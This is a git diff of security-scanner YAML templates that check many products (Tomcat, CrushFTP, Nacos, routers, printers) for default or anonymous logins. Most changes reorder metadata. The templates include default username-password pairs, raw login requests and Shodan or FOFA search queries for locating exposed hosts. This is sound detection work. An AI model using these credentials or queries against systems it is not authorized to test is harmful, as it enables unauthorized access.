+# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml
index 94a4226953..de9d55df06 100644
--- a/http/default-logins/apache/tomcat-default-login.yaml
+++ b/http/default-logins/apache/tomcat-default-login.yaml
@@ -8,15 +8,15 @@ info:
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
- metadata:
- max-request: 405
- shodan-query: title:"Apache Tomcat"
- product: tomcat
- vendor: apache
- tags: tomcat,apache,default-login
-
classification:
cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 405
+ vendor: apache
+ product: tomcat
+ shodan-query: title:"Apache Tomcat"
+ tags: tomcat,apache,default-login
+
http:
- raw:
- |
@@ -98,4 +98,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100e2f0325cd0d99bcd7a23cd738065048220ea18532e54ce329ccfb3bb44866d9602202efadadca274034c7078a8104fc4df513dba2c17d33d76d104490d8cd85db915:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e2f0325cd0d99bcd7a23cd738065048220ea18532e54ce329ccfb3bb44866d9602202efadadca274034c7078a8104fc4df513dba2c17d33d76d104490d8cd85db915:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml
index edf8280187..41d8cd9c76 100644
--- a/http/default-logins/asus/asus-rtn16-default-login.yaml
+++ b/http/default-logins/asus/asus-rtn16-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found.
+ classification:
+ cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: "RT-N16"
- product: rt-n16
vendor: asus
+ product: rt-n16
+ shodan-query: "RT-N16"
tags: default-login,asus,rt-n16
- classification:
- cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -44,4 +44,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/barco-clickshare-default-login.yaml b/http/default-logins/barco-clickshare-default-login.yaml
index 1dd8e0682a..552535cf89 100644
--- a/http/default-logins/barco-clickshare-default-login.yaml
+++ b/http/default-logins/barco-clickshare-default-login.yaml
@@ -6,28 +6,26 @@ info:
severity: high
description: |
Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found.
- metadata:
- max-request: 3
- shodan-query: "ClickShareSession"
- product: clickshare_cs-100_huddle_firmware
- vendor: barco
- tags: default-login,barco,clickshare
-
classification:
cpe: cpe:2.3:o:barco:clickshare_cs-100_huddle_firmware:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 3
+ vendor: barco
+ product: clickshare_cs-100_huddle_firmware
+ shodan-query: "ClickShareSession"
+ tags: default-login,barco,clickshare
+
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
-
- |
POST /login/log_me_in HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_protection_token={{token}}&username={{username}}&password={{password}}&eula_accepted=true
-
- |
GET /configuration_wizard HTTP/1.1
Host: {{Hostname}}
@@ -38,7 +36,6 @@ http:
- admin
password:
- admin
-
matchers:
- type: dsl
dsl:
@@ -55,4 +52,5 @@ http:
regex:
- '="csrf_protection_token" value="([0-9a-z]+)" \/>'
internal: true
-# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/batflat/batflat-default-login.yaml b/http/default-logins/batflat/batflat-default-login.yaml
index e75cb3895d..5d7bd05258 100644
--- a/http/default-logins/batflat/batflat-default-login.yaml
+++ b/http/default-logins/batflat/batflat-default-login.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.exploitalert.com/view-details.html?id=34749
- https://cxsecurity.com/issue/WLB-2020010100
+ classification:
+ cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- google-query: intext:"Powered by Batflat."
- product: batflat
vendor: batflat
+ product: batflat
+ google-query: intext:"Powered by Batflat."
tags: default-login,batflat
- classification:
- cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -43,4 +43,4 @@ http:
- 'contains(body, "Batflat - Dashboard")'
condition: and
-# digest: 490a0046304402201fd494d4a966f5e9588e9814d7f91e2b59c07416531b6f9c5656c76ea3ddcfef0220164999871087cfeb8221bedaf5d22d4aa2c452d80653fefac3c3032c89f443d0:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402201fd494d4a966f5e9588e9814d7f91e2b59c07416531b6f9c5656c76ea3ddcfef0220164999871087cfeb8221bedaf5d22d4aa2c452d80653fefac3c3032c89f443d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml
index a3c64eb5e4..46fe695806 100644
--- a/http/default-logins/bloofoxcms-default-login.yaml
+++ b/http/default-logins/bloofoxcms-default-login.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.bloofox.com/automated_setup.113.html
- https://www.bloofox.com
+ classification:
+ cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
- fofa-query: "Powered by bloofoxCMS"
- product: bloofoxcms
vendor: bloofox
+ product: bloofoxcms
+ fofa-query: "Powered by bloofoxCMS"
tags: bloofox,cms,default-login
- classification:
- cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -43,4 +43,4 @@ http:
- status_code == 200
condition: and
-# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml
index 312db35221..3b81c497d4 100644
--- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml
+++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml
@@ -6,23 +6,21 @@ info:
severity: high
description: |
CrushFTP Anonymous login credentials were discovered.
+ classification:
+ cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"CrushFTP"
- product: crushftp
vendor: crushftp
+ product: crushftp
+ shodan-query: html:"CrushFTP"
tags: default-logins,anonymous,crushftp,default-login
- classification:
- cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
http:
- raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
-
-
- |
POST /WebInterface/function/ HTTP/1.1
Host: {{Hostname}}
@@ -42,7 +40,6 @@ http:
words:
- "text/xml"
-
extractors:
- type: regex
name: auth
@@ -51,4 +48,5 @@ http:
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
-# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml
index fcc1e77dd2..af5bd36938 100644
--- a/http/default-logins/crushftp/crushftp-default-login.yaml
+++ b/http/default-logins/crushftp/crushftp-default-login.yaml
@@ -6,23 +6,21 @@ info:
severity: high
description: |
CrushFTP default login credentials were discovered.
+ classification:
+ cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"CrushFTP"
- product: crushftp
vendor: crushftp
+ product: crushftp
+ shodan-query: html:"CrushFTP"
tags: default-login,crushftp
- classification:
- cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
http:
- raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
-
-
- |
POST /WebInterface/function/ HTTP/1.1
Host: {{Hostname}}
@@ -31,15 +29,14 @@ http:
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
-
attack: pitchfork
payloads:
username:
- crushadmin
password:
- crushadmin
-
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -60,4 +57,5 @@ http:
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
-# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/dataease/dataease-default-login.yaml b/http/default-logins/dataease/dataease-default-login.yaml
index ae9aa86f9d..d1a4b82f91 100644
--- a/http/default-logins/dataease/dataease-default-login.yaml
+++ b/http/default-logins/dataease/dataease-default-login.yaml
@@ -9,16 +9,16 @@ info:
As a result, many Dataease can log in with this built-in account.
reference:
- https://github.com/dataease/dataease/issues/5995
+ classification:
+ cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Dataease"
- product: dataease
vendor: dataease_project
+ product: dataease
+ shodan-query: html:"Dataease"
tags: default-login,dataease
- classification:
- cpe: cpe:2.3:a:dataease_project:dataease:*:*:*:*:*:*:*:*
http:
- method: POST
path:
@@ -46,4 +46,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml
index 3078ced72b..f8da38a772 100644
--- a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml
+++ b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610
- https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html
+ classification:
+ cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
- product: elasticsearch
vendor: elastic
+ product: elasticsearch
+ shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667
tags: default-login,elasticsearch
- classification:
- cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -54,4 +54,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml
index f4078822de..e6876b9e96 100644
--- a/http/default-logins/esafenet-cdg-default-login.yaml
+++ b/http/default-logins/esafenet-cdg-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Esafenet electronic document security management system default credentials were discovered.
+ classification:
+ cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 32
- fofa-query: esafenet
- product: cdg
vendor: esafenet
+ product: cdg
+ fofa-query: esafenet
tags: esafenet,cdg,default-login
- classification:
- cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
http:
- method: POST
path:
@@ -57,4 +57,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/eurotel/etl3100-default-login.yaml b/http/default-logins/eurotel/etl3100-default-login.yaml
index 9a7dc5ea1c..0b936db90a 100644
--- a/http/default-logins/eurotel/etl3100-default-login.yaml
+++ b/http/default-logins/eurotel/etl3100-default-login.yaml
@@ -9,17 +9,17 @@ info:
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
- https://www.exploit-db.com/exploits/51684
+ classification:
+ cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
+ vendor: eurotel
+ product: etl3100
shodan-query: html:"ETL3100"
fofa-query: body="ETL3100"
- product: etl3100
- vendor: eurotel
tags: misconfig,default-login,eurotel
- classification:
- cpe: cpe:2.3:h:eurotel:etl3100:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -46,4 +46,4 @@ http:
- 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
condition: and
-# digest: 4a0a00473045022100e1b485875e9a95c6bc7e5419031120cf28227436b5582be699663c9c6c30bc2a02204e3000fba07b11212721e1ffbfffdcc3b5aec852c2af6860eb564d491bc2f0e4:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e1b485875e9a95c6bc7e5419031120cf28227436b5582be699663c9c6c30bc2a02204e3000fba07b11212721e1ffbfffdcc3b5aec852c2af6860eb564d491bc2f0e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml
index 5739fee285..5e3b829a5c 100644
--- a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml
+++ b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml
@@ -8,16 +8,16 @@ info:
Attackers can log in through admin:admin, check the system status, and configure the device.
reference:
- https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
+ classification:
+ cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="飞鱼星企业级智能上网行为管理系统"
- product: vec40g
vendor: feiyuxing
+ product: vec40g
+ fofa-query: title="飞鱼星企业级智能上网行为管理系统"
tags: feiyuxing,default-login,iot
- classification:
- cpe: cpe:2.3:h:feiyuxing:vec40g:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -52,4 +52,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/franklin-fueling-default-login.yaml b/http/default-logins/franklin-fueling-default-login.yaml
index f8f8f56fb4..41cada3fba 100644
--- a/http/default-logins/franklin-fueling-default-login.yaml
+++ b/http/default-logins/franklin-fueling-default-login.yaml
@@ -8,16 +8,16 @@ info:
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
reference:
- https://www.exploitalert.com/view-details.html?id=39466
+ classification:
+ cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- google-query: inurl:"relay_status.html"
- product: ts-550_evo_firmware
vendor: franklinfueling
+ product: ts-550_evo_firmware
+ google-query: inurl:"relay_status.html"
tags: default-login,franklin
- classification:
- cpe: cpe:2.3:o:franklinfueling:ts-550_evo_firmware:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -44,4 +44,4 @@ http:
- 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
condition: and
-# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d5fb1d6e90816511a5ca93642f672cdf7dac17f76021b2e075536aa8ff53569a022100b25f24690490e8a5c05269f473a92f475477111a20a37dfc80da558bd20ff70d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml
index 3465fe08b1..0337bbbe6d 100644
--- a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml
+++ b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml
@@ -8,16 +8,16 @@ info:
This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2.
reference:
- https://4it.com.au/kb/article/fuji-xerox-default-password/
- metadata:
- max-request: 1
- verified: true
- vendor: fujixerox
- fofa-query: '"prop.htm" && "docucentre"'
- product: apeosport-v_c3375
- tags: default-login,fuji,fuji-xerox,printer
-
classification:
cpe: cpe:2.3:h:fujixerox:apeosport-v_c3375:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: fujixerox
+ product: apeosport-v_c3375
+ fofa-query: '"prop.htm" && "docucentre"'
+ tags: default-login,fuji,fuji-xerox,printer
+
http:
- raw:
- |
@@ -39,4 +39,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022021dddab097e239a58636b5c6b839cb7e8e8217298f30238bc710a0d23916c515022100a53010047899140f9321c168495bd9117f6b5989d5a0c51d773d10034cfac106:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/gitblit/gitblit-default-login.yaml b/http/default-logins/gitblit/gitblit-default-login.yaml
index e12c786dd2..616391aa98 100644
--- a/http/default-logins/gitblit/gitblit-default-login.yaml
+++ b/http/default-logins/gitblit/gitblit-default-login.yaml
@@ -8,16 +8,16 @@ info:
Gitblit Default login credentials were discovered.
reference:
- https://www.gitblit.com/administration.html
- metadata:
- max-request: 1
- verified: true
- shodan-query: title:"Gitblit"
- product: gitblit
- vendor: gitblit
- tags: gitblit,default-login
-
classification:
cpe: cpe:2.3:a:gitblit:gitblit:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: gitblit
+ product: gitblit
+ shodan-query: title:"Gitblit"
+ tags: gitblit,default-login
+
http:
- raw:
- |
@@ -50,4 +50,5 @@ http:
- type: dsl
dsl:
- "len(body) == 0"
-# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220691d3ee89f1594b342246ca8ab8be803b73a21e02aba3351ad7b37b30b3f6212022100cc37beb5ccfc7c249f775ab36ff557cd283ed426c4481be17cf0ac8c03dd6307:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml
index 8e5f4046e8..6021ad3cb8 100644
--- a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml
+++ b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
ISPConfig Hosting Control Panel Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
- metadata:
- shodan-query: title:"ISPConfig" http.favicon.hash:483383992
- verified: true
- max-request: 1
- product: ispconfig
- vendor: ispconfig
- tags: ispconfig,hsp,default-login
-
classification:
cpe: cpe:2.3:a:ispconfig:ispconfig:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: ispconfig
+ product: ispconfig
+ shodan-query: title:"ISPConfig" http.favicon.hash:483383992
+ tags: ispconfig,hsp,default-login
+
http:
- raw:
- |
@@ -47,4 +47,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e7b51ff042816b2a91fc83f9eb1d6a699a9f1d9ce697b576f832ba2df52b54f6022100f76011928c63307d6c2770a217a88ae56963db3bc1fc5beac17f2e64fb95acbd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/jeedom/jeedom-default-login.yaml b/http/default-logins/jeedom/jeedom-default-login.yaml
index cb03134d89..9761315c5a 100644
--- a/http/default-logins/jeedom/jeedom-default-login.yaml
+++ b/http/default-logins/jeedom/jeedom-default-login.yaml
@@ -6,16 +6,15 @@ info:
severity: high
description: |
Jeedom default login has been detected.
+ classification:
+ cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"Jeedom"
- product: jeedom
vendor: jeedom
+ product: jeedom
+ shodan-query: title:"Jeedom"
tags: jeedom,default-login,misconfig
-
- classification:
- cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
variables:
username: admin
password: admin
@@ -28,7 +27,6 @@ http:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=login&username={{username}}&password={{password}}&twoFactorCode=&storeConnection=0
-
- |
GET /index.php?v=d&p=dashboard HTTP/1.1
Host: {{Hostname}}
@@ -48,4 +46,5 @@ http:
- "logout=1"
- "Plugins"
condition: and
-# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100d838f2114c2e5ad9fa46212ed4bde036770bbcc1d6f86e788eb2c472bc20b14f0220757a748fbfb0168ebf6df5b34ce6c2b8490928a8ddd47a17937ce345d4211253:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml
index b444f7412f..99bf90e6a1 100644
--- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml
+++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml
@@ -6,16 +6,16 @@ info:
severity: medium
description: |
mantisbt Anonymous login were discovered.
+ classification:
+ cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:662709064
- product: mantisbt
vendor: mantisbt
+ product: mantisbt
+ shodan-query: http.favicon.hash:662709064
tags: default-logins,anonymous,mantisbt,default-login
- classification:
- cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022028ec65ce3e6d3aa1d7f9b172f42abba78d50ca73879cb1d4baa327b0814f8efa02207f8bc1d513857f405f1f9448e0e5ac2b1b2518d020749587164e0138f4d353b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/nacos/nacos-default-login.yaml b/http/default-logins/nacos/nacos-default-login.yaml
index 7f27fe7bba..8fe5268d86 100644
--- a/http/default-logins/nacos/nacos-default-login.yaml
+++ b/http/default-logins/nacos/nacos-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
The default username and password for Nacos are both nacos.
+ classification:
+ cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- fofa-query: title=="Nacos"
- product: nacos
vendor: alibaba
+ product: nacos
+ fofa-query: title=="Nacos"
tags: nacos,default-login,alibaba
- classification:
- cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -59,4 +59,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml
index 1e22eb91c0..e1df4abf20 100644
--- a/http/default-logins/netflow/netflow-default-login.yaml
+++ b/http/default-logins/netflow/netflow-default-login.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Netflow Analyzer default login was discovered.
+ classification:
+ cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Login - Netflow Analyzer"
- product: manageengine_netflow_analyzer
vendor: zohocorp
+ product: manageengine_netflow_analyzer
+ shodan-query: html:"Login - Netflow Analyzer"
tags: default-login,netflow,misconfig
- classification:
- cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -45,4 +45,5 @@ http:
part: location
words:
- "/netflow;jsessionid"
-# digest: 4b0a00483046022100a6e60cf558d5d6383bae690c8c770dbe0656def6cd80d1ddb7dfa85fe6ed1798022100d4981c561c132ddd0fab88f05be6f7d771c891e7958877ee6bcdf6725f637729:922c64590222798bb761d5b6d8e72950
+
